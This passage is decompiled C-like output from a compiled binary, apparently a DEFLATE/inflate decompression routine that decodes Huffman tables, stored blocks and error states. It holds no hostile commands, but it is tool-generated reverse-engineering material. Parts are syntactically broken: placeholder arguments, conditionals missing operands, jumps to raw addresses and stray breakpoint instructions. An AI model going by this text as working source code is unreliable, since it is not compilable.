																 *(_t1058 - 0x1c) = _t596;
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	L133:
																	_t1017 = _t1022 + _t893 * 4;
																	_t1036 =  *(_t1058 - 4);
																	 *(_t1017 + 0x2c) = (0x00000001 <<  *(_t1058 - 0x1c)) - 0x00000001 & _t1036;
																	_t804 =  *(_t1058 - 8);
																	_t931 =  *((char*)(_t804 + 0x121004));
																	_t1037 = _t1036 >> _t931;
																	_t1043 = _t1043 - _t931;
																	_t932 = _t804;
																	 *(_t1058 - 4) = _t1037;
																	 *(_t1058 - 0x1c) = _t1043;
																	_t596 =  *(0x121a38 + _t932 * 4);
																	 *(_t1017 + 0x2c) =  *(_t1017 + 0x2c) +  *(0x121a38 + _t932 * 4);
																	_t991 = _t1037;
																	_t1022 =  *(_t1058 - 0x14);
																	_t893 = _t932 + 1;
																	continue;
																} else {
																	while(1) {
																		L131:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L132:
																		_t806 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t893 =  *(_t1058 - 8);
																		_t991 = _t991 | _t806;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 0x18) = _t841;
																		 *(_t1058 - 4) = _t991;
																		_t596 =  *((char*)(_t893 + 0x121004));
																		 *(_t1058 - 0x1c) = _t596;
																		__eflags = _t1043 - _t596;
																		if(_t1043 < _t596) {
																			continue;
																		} else {
																			goto L133;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1022 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L134:
															goto L0;
														} else {
															L126:
															goto 0x3013af;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t596 + 0x2c)) = 0x120;
															L127:
															_t808 = _t596 + 1 - 0x20;
															 *_t808 =  *_t808 + _t808;
															_t841 = _t841 + _t808;
															_t809 = _t808 + 1;
															 *_t809 =  *_t809 ^ _t809;
															 *_t809 = _t809 +  *_t809;
															 *0xde0 =  *0xde0 + _t809;
															memset(_t809, ??, ??);
															asm("movdqa xmm0, [0x121ae0]");
															_t1061 = _t1061 + 0xc;
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqu [edi+0x70], xmm0");
															asm("movdqu [edi+0x80], xmm0");
															asm("movdqu [edi+0x90], xmm0");
															asm("movdqu [edi+0xa0], xmm0");
															asm("movdqu [edi+0xb0], xmm0");
															asm("movdqu [edi+0xc0], xmm0");
															_t1038 = _t1022 + 0xd0;
															asm("movdqa xmm0, [0x121af0]");
															asm("movdqu [edi], xmm0");
															asm("movdqu [edi+0x10], xmm0");
															asm("movdqu [edi+0x20], xmm0");
															asm("movdqu [edi+0x30], xmm0");
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqa xmm0, [0x121ad0]");
															asm("movdqu [edi+0x70], xmm0");
															asm("movq [edi+0x80], xmm0");
															 *((intOrPtr*)(_t1038 + 0x88)) = 0x8080808;
															 *((intOrPtr*)(_t1038 + 0x8c)) = 0x8080808;
															_t1022 =  *(_t1058 - 0x14);
															goto L141;
														}
													}
												} else {
													L90:
													_t596 = _t1043 & 0x00000007;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														L93:
														_t935 = _t1043 & 0x00000007;
														_t962 = _t991 >> _t935;
														_t1043 = _t1043 - _t935;
														 *(_t1058 - 4) = _t962;
														_t936 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1058 - 8) = _t936;
															__eflags = _t936 - 4;
															if(_t936 >= 4) {
																break;
															}
															L95:
															__eflags = _t1043;
															if(_t1043 == 0) {
																L101:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L244:
																	 *_t1022 = 7;
																	goto L285;
																} else {
																	L102:
																	_t596 =  *_t841;
																	_t841 = _t841 + 1;
																	(_t1022 + 0x2920)[_t936] = _t596;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 0x18) = _t841;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1043 - 8;
																if(_t1043 >= 8) {
																	L100:
																	(_t1022 + 0x2920)[_t936] = _t962;
																	_t1043 = _t1043 - 8;
																	_t962 = _t962 >> 8;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 4) = _t962;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L98:
																		_t596 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t962 = _t962 | _t596;
																		 *(_t1058 - 0x18) = _t841;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 4) = _t962;
																		__eflags = _t1043 - 8;
																		if(_t1043 < 8) {
																			continue;
																		} else {
																			L99:
																			_t936 =  *(_t1058 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1022 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t596 =  *(_t1022 + 0x2922) & 0x000000ff;
														 *(_t1058 - 8) = ( *(_t1022 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1022 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1058 - 8) - ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff);
														if( *(_t1058 - 8) != ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff)) {
															L265:
															 *(_t1058 - 0xc) = 0xffffffff;
															 *_t1022 = 0x27;
															goto L292;
														} else {
															L104:
															_t944 =  *(_t1058 - 8);
															while(1) {
																L105:
																__eflags = _t944;
																if(_t944 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1043;
																if(_t1043 == 0) {
																	L113:
																	_t596 =  *(_t1058 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t944;
																		if(_t944 == 0) {
																			break;
																		}
																		L116:
																		_t1018 =  *((intOrPtr*)(_t1058 - 0x40));
																		__eflags = _t596 - _t1018;
																		if(_t596 < _t1018) {
																			L118:
																			_t596 =  *(_t1058 - 0x20);
																			__eflags = _t841 - _t596;
																			if(_t841 >= _t596) {
																				L247:
																				_t1022 =  *(_t1058 - 0x14);
																				 *_t1022 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t962 = _t1018 -  *(_t1058 - 0x10);
																				_t1040 = _t596 - _t841;
																				__eflags = _t962 - _t1040;
																				_t814 =  <  ? _t962 : _t1040;
																				__eflags = ( <  ? _t962 : _t1040) - _t944;
																				if(( <  ? _t962 : _t1040) >= _t944) {
																					_t1022 = _t944;
																				} else {
																					__eflags = _t962 - _t1040;
																					_t1022 =  <  ? _t962 : _t1040;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t841 = _t841 + _t1022;
																				_t596 =  *(_t1058 - 0x10) + _t1022;
																				_t1061 = _t1061 + 0xc;
																				 *(_t1058 - 0x18) = _t841;
																				_t944 =  *(_t1058 - 8) - _t1022;
																				 *(_t1058 - 0x10) = _t596;
																				 *(_t1058 - 8) = _t944;
																				continue;
																			}
																		} else {
																			L117:
																			_t1022 =  *(_t1058 - 0x14);
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x301388;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1043 - 8;
																	if(_t1043 >= 8) {
																		L110:
																		_t596 = _t962 & 0x000000ff;
																		_t962 = _t962 >> 8;
																		_t1043 = _t1043 - 8;
																		 *(_t1058 - 0x28) = _t596;
																		 *(_t1058 - 4) = _t962;
																		L111:
																		__eflags =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 - 0x40));
																		_t1022 =  *(_t1058 - 0x14);
																		if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																			L246:
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																			 *( *(_t1058 - 0x10)) = _t596;
																			_t944 =  *(_t1058 - 8) - 1;
																			 *(_t1058 - 8) = _t944;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t841 -  *(_t1058 - 0x20);
																			if(_t841 >=  *(_t1058 - 0x20)) {
																				break;
																			}
																			L109:
																			_t596 = ( *_t841 & 0x000000ff) << _t1043;
																			_t841 = _t841 + 1;
																			_t962 = _t962 | _t596;
																			 *(_t1058 - 0x18) = _t841;
																			_t1043 = _t1043 + 8;
																			 *(_t1058 - 4) = _t962;
																			__eflags = _t1043 - 8;
																			if(_t1043 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1022 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t841 -  *(_t1058 - 0x20);
															if(_t841 >=  *(_t1058 - 0x20)) {
																break;
															}
															L92:
															_t820 = ( *_t841 & 0x000000ff) << _t1043;
															_t1043 = _t1043 + 8;
															_t991 = _t991 | _t820;
															_t841 = _t841 + 1;
															 *(_t1058 - 0x18) = _t841;
															_t596 = _t1043 & 0x00000007;
															 *(_t1058 - 4) = _t991;
															__eflags = _t1043 - _t596;
															if(_t1043 < _t596) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1022 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L88:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t962 = _t962 | _t596;
													 *(_t1058 - 0x18) = _t841;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - 3;
													if(_t1043 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1022 = 3;
												goto L285;
											}
											goto L295;
										}
										L252:
										_t596 = _t1043 & 0x00000007;
										__eflags = _t1043 - _t596;
										if(_t1043 >= _t596) {
											L256:
											_t683 =  *(_t1058 - 0x3c);
											_t886 = _t1043 & 0x00000007;
											_t986 = _t962 >> _t886;
											_t1043 = _t1043 - _t886;
											 *(_t1058 - 4) = _t986;
											__eflags = _t841 - _t683;
											if(_t841 > _t683) {
												while(1) {
													L257:
													__eflags = _t1043 - 8;
													if(_t1043 < 8) {
														goto L259;
													}
													L258:
													_t841 = _t841 - 1;
													_t1043 = _t1043 - 8;
													__eflags = _t841 - _t683;
													if(_t841 > _t683) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t596 = _t1043;
											asm("bts edx, eax");
											__eflags = _t596 - 0x20;
											_t888 =  >=  ? _t986 : 0;
											_t987 = _t986 ^ _t888;
											__eflags = _t596 - 0x40;
											_t889 =  >=  ? _t987 : _t888;
											 *(_t1058 - 4) =  *(_t1058 - 4) & _t987 - 0x00000001;
											__eflags =  *(_t1058 + 0x18) & 0x00000001;
											if(( *(_t1058 + 0x18) & 0x00000001) == 0) {
												L290:
												_t684 = 0;
												__eflags = 0;
												 *_t1022 = 0x22;
												L291:
												 *(_t1058 - 0xc) = _t684;
												goto L292;
											} else {
												L261:
												_t890 = 0;
												while(1) {
													L277:
													 *(_t1058 - 8) = _t890;
													__eflags = _t890 - 4;
													if(_t890 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1043;
													if(_t1043 != 0) {
														L281:
														_t989 =  *(_t1058 - 4);
														__eflags = _t1043 - 8;
														if(_t1043 >= 8) {
															L275:
															_t685 = _t989 & 0x000000ff;
															_t1043 = _t1043 - 8;
															__eflags = _t1043;
															 *(_t1058 - 4) = _t989 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	break;
																}
																L273:
																_t596 = ( *_t841 & 0x000000ff) << _t1043;
																_t1043 = _t1043 + 8;
																_t989 = _t989 | _t596;
																_t841 = _t841 + 1;
																 *(_t1058 - 4) = _t989;
																__eflags = _t1043 - 8;
																if(_t1043 < 8) {
																	continue;
																} else {
																	L274:
																	_t890 =  *(_t1058 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1022 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															L283:
															 *_t1022 = 0x2a;
															goto L285;
														} else {
															L280:
															_t685 =  *_t841 & 0x000000ff;
															_t841 = _t841 + 1;
															L276:
															 *(_t1058 - 0x24) = _t685;
															_t596 =  *(_t1022 + 0x10) << 0x00000008 |  *(_t1058 - 0x24);
															_t890 = _t890 + 1;
															__eflags = _t890;
															 *(_t1022 + 0x10) = _t596;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													break;
												}
												L255:
												_t690 = ( *_t841 & 0x000000ff) << _t1043;
												_t1043 = _t1043 + 8;
												_t962 = _t962 | _t690;
												_t841 = _t841 + 1;
												 *(_t1058 - 4) = _t962;
												_t596 = _t1043 & 0x00000007;
												__eflags = _t1043 - _t596;
												if(_t1043 < _t596) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1022 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1043 - 0xf;
									if(_t1043 < 0xf) {
										_t999 =  *(_t841 + 1) & 0x000000ff;
										_t880 = _t1043;
										_t721 =  *_t841 & 0x000000ff;
										_t841 = _t841 + 2;
										_t1022 =  *(_t1058 - 0x14);
										 *(_t1058 - 0x18) = _t841;
										 *(_t1058 - 4) =  *(_t1058 - 4) | (_t999 << 0x00000008 | _t721) << _t880;
										_t1043 = _t1043 + 0x10;
										__eflags = _t1043;
										_t962 =  *(_t1058 - 4);
									}
									_t714 =  *((short*)(_t1022 + 0x160 + (_t962 & 0x000003ff) * 2));
									 *(_t1058 - 0x1c) = _t714;
									__eflags = _t714;
									if(_t714 < 0) {
										L53:
										goto 0x301349;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t716 = _t962 >> _t880;
											_t880 = _t880 + 1;
											_t841 =  *((short*)(_t1022 + 0x960 + ((_t716 & 0x00000001) +  !_t841) * 2));
											__eflags = _t841;
										} while (_t841 < 0);
										 *(_t1058 - 0x1c) = _t841;
										_t841 =  *(_t1058 - 0x18);
									} else {
										L52:
										_t880 = _t714 >> 9;
									}
									L56:
									_t596 =  *(_t1058 - 8);
									_t1043 = _t1043 - _t880;
									_t962 = _t962 >> _t880;
									 *(_t1058 - 4) = _t962;
									 *( *(_t1058 - 0x10)) = _t596;
									_t880 =  *(_t1058 - 0x1c);
									__eflags = _t880 & 0x00000100;
									if((_t880 & 0x00000100) != 0) {
										L83:
										_t170 = _t1058 - 0x10;
										 *_t170 =  *(_t1058 - 0x10) + 1;
										__eflags =  *_t170;
										goto L84;
									} else {
										L57:
										_t719 =  *(_t1058 - 0x10);
										 *(_t719 + 1) = _t880;
										 *(_t1058 - 0x10) = _t719 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t879 =  *(_t1058 - 0x20) - _t841;
													__eflags = _t879 - 4;
													if(_t879 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t877;
											} while (_t877 == 0);
											goto 0x3012e3;
											asm("int3");
											_t824 =  *_t830;
											 *_t1022 = _t824;
											_t1022 =  *(_t1058 - 0x14);
											__eflags = _t877 - 1;
											if(_t877 > 1) {
												L29:
												L36:
												goto 0x30131f;
												asm("int3");
												 *(_t982 + 1) =  *((intOrPtr*)(_t824 + 1));
												_t982 =  *(_t1058 - 4);
											}
											L38:
											_t85 = _t1058 - 0x10;
											 *_t85 = _t877 +  *(_t1058 - 0x10);
											__eflags =  *_t85;
											while(1) {
												L39:
												_t879 =  *(_t1058 - 0x20) - _t841;
												__eflags = _t879 - 4;
												if(_t879 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1058 - 0x10) = _t1022;
											_t1022 =  *(_t1058 - 0x14);
											 *(_t1058 - 0xc) = _t982;
											_t982 =  *(_t1058 - 4);
											 *(_t1058 - 8) = _t877;
											__eflags = _t877;
										} while (_t877 <= 0);
										goto 0x30130b;
										asm("int3");
										_t824 =  *_t666;
										 *_t1022 = _t824;
										_t1022 =  *(_t1058 - 0x14);
										__eflags = _t877 - 1;
										if(_t877 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							goto L295;
							L58:
							__eflags = _t1043 - 0xf;
							if(_t1043 >= 0xf) {
								L75:
								_t669 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t669;
								__eflags = _t669;
								if(_t669 < 0) {
									L77:
									goto 0x301372;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t671 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t671 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L76:
									_t879 = _t669 >> 9;
									_t596 = _t669 & 0x000001ff;
									 *(_t1058 - 8) = _t596;
								}
								L80:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 - 0x100;
								if(_t880 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t822 =  *(_t1058 - 0x10);
									__eflags = _t822 -  *((intOrPtr*)(_t1058 - 0x40));
									if(_t822 >=  *((intOrPtr*)(_t1058 - 0x40))) {
										L240:
										 *(_t1058 - 0xc) = 2;
										 *_t1022 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t822 = _t880;
										 *(_t1058 - 0x10) = _t822 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t879 - 2;
								if(_t879 >= 2) {
									L73:
									_t992 =  *(_t841 + 1) & 0x000000ff;
									_t695 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									_t879 = _t1043;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | _t992 << _t1043 + 0x00000008 | _t695 << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t596 = _t982 & 0x000003ff;
										_t1025 =  *((short*)(_t1022 + 0x160 + _t596 * 2));
										__eflags = _t1025;
										if(_t1025 < 0) {
											L64:
											__eflags = _t1043 - 0xa;
											if(_t1043 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1058 - 0x1c) = _t879;
												while(1) {
													L67:
													_t1025 =  *((short*)( *(_t1058 - 0x14) + 0x960 + ((_t982 >> _t879 & 0x00000001) +  !_t1025) * 2));
													_t879 =  *(_t1058 - 0x1c) + 1;
													 *(_t1058 - 0x1c) = _t879;
													__eflags = _t1025;
													if(_t1025 >= 0) {
														goto L74;
													}
													L68:
													_t596 = _t879 + 1;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1027 = _t1025 >> 9;
											__eflags = _t1027;
											if(_t1027 == 0) {
												L69:
												_t1022 =  *(_t1058 - 0x14);
												L70:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													L239:
													 *_t1022 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1043 - _t1027;
												if(_t1043 >= _t1027) {
													L74:
													_t1022 =  *(_t1058 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t879 = _t1043;
										_t699 = ( *_t841 & 0x000000ff) << _t879;
										_t841 = _t841 + 1;
										_t982 = _t982 | _t699;
										 *(_t1058 - 0x18) = _t841;
										_t1043 = _t1043 + 8;
										 *(_t1058 - 4) = _t982;
										__eflags = _t1043 - 0xf;
									} while (_t1043 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1058 - 0xc) = 0x40 + _t694 * 0xda0 + _t1022;
					memset(_t1058 - 0xd0, 0, 0x40);
					memset( *(_t1058 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1058 - 0xc) + 0x920, 0, 0x480);
					_t894 = 0;
					_t1061 = _t1061 + 0x24;
					_t1005 = _t1022 + ( *(_t1022 + 0x18) + 0xb) * 4;
					 *(_t1058 - 0x44) = _t1005;
					__eflags =  *_t1005;
					if( *_t1005 > 0) {
						L143:
						_t1022 =  *(_t1058 - 0xc);
						do {
							L144:
							_t797 =  *(_t894 + _t1022) & 0x000000ff;
							_t894 = _t894 + 1;
							 *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) =  *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) + 1;
							__eflags = _t894 -  *_t1005;
						} while (_t894 <  *_t1005);
					}
					L145:
					goto 0x3013d7;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1058 - 0x8c) = _t894;
					 *(_t1058 - 0x90) = _t894;
					 *(_t1058 - 0x2c) = _t894;
					 *(_t1058 - 0x30) = _t894;
					do {
						L147:
						_t734 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd4));
						_t896 = _t894 + _t734 + _t894 + _t734;
						_t1022 = _t1022 + _t734;
						_t735 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd0));
						 *(_t1058 - 0x30) =  *(_t1058 - 0x30) + _t735;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x90)) = _t896;
						_t736 =  *((intOrPtr*)(_t1058 + _t1005 - 0xcc));
						_t898 = _t896 + _t735 + _t896 + _t735;
						 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) + _t736;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x8c)) = _t898;
						_t894 = _t898 + _t736 + _t898 + _t736;
						 *(_t1058 + _t1005 - 0x88) = _t894;
						_t1005 = _t1005 + 0xc;
						__eflags = _t1005 - 0x40;
					} while (_t1005 <= 0x40);
					 *(_t1058 - 0x4c) = _t894;
					 *(_t1058 - 0x24) = _t1022;
					_t1022 =  *(_t1058 - 0x14);
					_t901 =  *(_t1058 - 0x24) +  *(_t1058 - 0x2c) +  *(_t1058 - 0x30);
					__eflags =  *(_t1058 - 0x4c) - 0x10000;
					if( *(_t1058 - 0x4c) == 0x10000) {
						L150:
						_t739 =  *(_t1058 - 0x44);
						 *(_t1058 - 0x30) = 0xffffffff;
						 *(_t1058 - 0x4c) = 0;
						__eflags =  *_t739;
						if( *_t739 > 0) {
							L151:
							_t1057 =  *(_t1058 - 0x4c);
							do {
								L152:
								L153:
								_t913 =  *(_t1057 + _t739) & 0x000000ff;
								 *(_t1058 - 0x44) = _t913;
								__eflags = _t913;
								if(_t913 != 0) {
									L154:
									_t776 =  *(_t1058 + _t913 * 4 - 0x90);
									 *(_t1058 - 0x2c) = _t776;
									 *(_t1058 + _t913 * 4 - 0x90) = _t776 + 1;
									 *(_t1058 - 0x24) = _t913;
									__eflags = _t913;
									if(_t913 != 0) {
										L155:
										do {
											L156:
											 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) >> 1;
											_t796 =  *(_t1058 - 0x24) - 1;
											_t1005 = _t1005 + _t1005 |  *(_t1058 - 0x2c) & 0x00000001;
											 *(_t1058 - 0x24) = _t796;
											__eflags = _t796;
										} while (_t796 != 0);
										_t913 =  *(_t1058 - 0x44);
									}
									L158:
									__eflags = _t913 - 0xa;
									if(_t913 > 0xa) {
										L164:
										_t780 =  *(_t1058 - 0xc) + 0x120 + (_t1005 & 0x000003ff) * 2;
										_t841 =  *(_t1058 - 0x30);
										 *(_t1058 - 0x44) = _t780;
										_t781 =  *_t780;
										 *(_t1058 - 0x2c) = _t781;
										__eflags = _t781;
										if(_t781 == 0) {
											 *( *(_t1058 - 0x44)) = _t841;
											_t781 = _t841;
											_t841 = _t841 - 2;
											__eflags = _t841;
											 *(_t1058 - 0x2c) = _t781;
											 *(_t1058 - 0x30) = _t841;
										}
										L166:
										_t1013 = _t1005 >> 9;
										__eflags = _t913 - 0xb;
										if(_t913 > 0xb) {
											L167:
											_t914 = _t913 + 0xfffffff5;
											__eflags = _t914;
											 *(_t1058 - 0x24) = _t914;
											_t915 =  *(_t1058 - 0x2c);
											do {
												L168:
												_t1013 = _t1013 >> 1;
												_t786 = 0x48f - _t915 - (_t1013 & 0x00000001);
												_t918 =  *( *(_t1058 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t918;
												if(_t918 != 0) {
													_t915 = _t918;
												} else {
													 *( *(_t1058 - 0xc) + _t786 * 2) = _t841;
													_t787 =  *(_t1058 - 0x30);
													_t915 = _t787;
													_t788 = _t787 - 2;
													 *(_t1058 - 0x30) = _t788;
													_t841 = _t788;
												}
												L171:
												_t361 = _t1058 - 0x24;
												 *_t361 =  *(_t1058 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1058 - 0x2c) = _t915;
											_t781 = _t915;
										}
										L173:
										_t1005 = (_t1013 >> 0x00000001 & 0x00000001) - _t781;
										__eflags = _t1005;
										 *( *(_t1058 - 0xc) + 0x91e + _t1005 * 2) = _t1057;
									} else {
										L159:
										_t793 = (_t913 << 0x00000009 | _t1057) & 0x0000ffff;
										 *(_t1058 - 0x44) = _t793;
										__eflags = _t1005 - 0x400;
										if(_t1005 < 0x400) {
											L160:
											goto 0x301401;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t794 = _t793 << _t913;
											 *(_t1058 - 0x4c) = _t794 + _t794;
											_t923 =  *(_t1058 - 0xc) + _t1005 * 2 + 0x120;
											__eflags = _t923;
											do {
												L162:
												 *_t923 = _t1022;
												_t1005 = _t1005 + _t794;
												_t923 = _t923 +  *(_t1058 - 0x4c);
												__eflags = _t1005 - 0x400;
											} while (_t1005 < 0x400);
											_t1022 =  *(_t1058 - 0x14);
										}
									}
								}
								L174:
								_t739 =  *(_t1022 + 0x18);
								_t1057 = _t1057 + 1;
								__eflags = _t1057 -  *((intOrPtr*)(_t1022 + 0x2c + _t739 * 4));
							} while (_t1057 <  *((intOrPtr*)(_t1022 + 0x2c + _t739 * 4)));
							goto 0x301417;
							asm("int3");
						}
						L176:
						__eflags =  *(_t1022 + 0x18) - 2;
						if( *(_t1022 + 0x18) != 2) {
							L217:
							 *(_t1022 + 0x18) =  *(_t1022 + 0x18) - 1;
							goto L141;
						} else {
							L177:
							_t902 = 0;
							__eflags = 0;
							while(1) {
								L178:
								_t1006 =  *(_t1058 - 4);
								while(1) {
									L179:
									 *(_t1058 - 8) = _t902;
									__eflags = _t902 -  *(_t1022 + 0x30) +  *(_t1022 + 0x2c);
									if(_t902 >=  *(_t1022 + 0x30) +  *(_t1022 + 0x2c)) {
										break;
									}
									L180:
									__eflags = _t1057 - 0xf;
									if(_t1057 >= 0xf) {
										L197:
										_t754 =  *((short*)(_t1022 + 0x1ca0 + (_t1006 & 0x000003ff) * 2));
										 *(_t1058 - 0x28) = _t754;
										__eflags = _t754;
										if(_t754 < 0) {
											L199:
											L200:
											do {
												L201:
												 *(_t1058 - 0x28) =  !( *(_t1058 - 0x28));
												_t756 = _t1006 >> _t902;
												_t902 = _t902 + 1;
												_t596 =  *((short*)(_t1022 + 0x24a0 + ((_t756 & 0x00000001) +  *(_t1058 - 0x28)) * 2));
												 *(_t1058 - 0x28) = _t596;
												__eflags = _t596;
											} while (_t596 < 0);
										} else {
											L198:
											_t902 = _t754 >> 9;
											_t596 = _t754 & 0x000001ff;
											 *(_t1058 - 0x28) = _t596;
										}
										L202:
										_t1006 = _t1006 >> _t902;
										_t1043 = _t1057 - _t902;
										 *(_t1058 - 4) = _t1006;
										 *(_t1058 - 0x1c) = _t1043;
										__eflags = _t596 - 0x10;
										if(__eflags >= 0) {
											L204:
											if(__eflags != 0) {
												L207:
												_t903 =  *((char*)(_t596 + 0x120ff0));
												 *(_t1058 - 0x38) = _t903;
												__eflags = _t1043 - _t903;
												if(_t1043 >= _t903) {
													L211:
													_t1043 = _t1043 - _t903;
													 *(_t1058 - 0x1c) = _t1043;
													_t904 =  *(_t1058 - 0x14);
													_t1032 = ((0x00000001 << _t903) - 0x00000001 & _t1006) +  *((char*)(_t596 + 0x120ff8));
													__eflags =  *(_t1058 - 0x28) - 0x10;
													_t760 =  *(_t1058 - 8);
													 *(_t1058 - 4) = _t1006 >> _t903;
													if( *(_t1058 - 0x28) != 0x10) {
														_t1009 = 0;
														__eflags = 0;
													} else {
														_t1009 =  *(_t760 + _t904 + 0x2923) & 0x000000ff;
													}
													L214:
													memset(_t760 + _t904 + 0x2924, _t1009, _t1032);
													_t1061 = _t1061 + 0xc;
													_t902 =  *(_t1058 - 8) + _t1032;
													_t1022 =  *(_t1058 - 0x14);
													L178:
													_t1006 =  *(_t1058 - 4);
													continue;
